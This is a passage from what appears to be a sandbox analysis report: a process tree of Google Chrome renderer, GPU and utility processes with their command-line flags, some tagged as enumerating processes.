C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4876 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5376 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6336 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6588 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1568 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1564 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6656 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6732 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6628 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3020 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3104 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6896 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6436 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6512 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7052 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6812 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3236 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7152 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6816 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6756 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6924 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=976 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5836 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4836 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4492 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6148 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5144 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3084 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6852 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1588 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7116 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=892 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6576 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7144 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4512 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3192 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6380 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
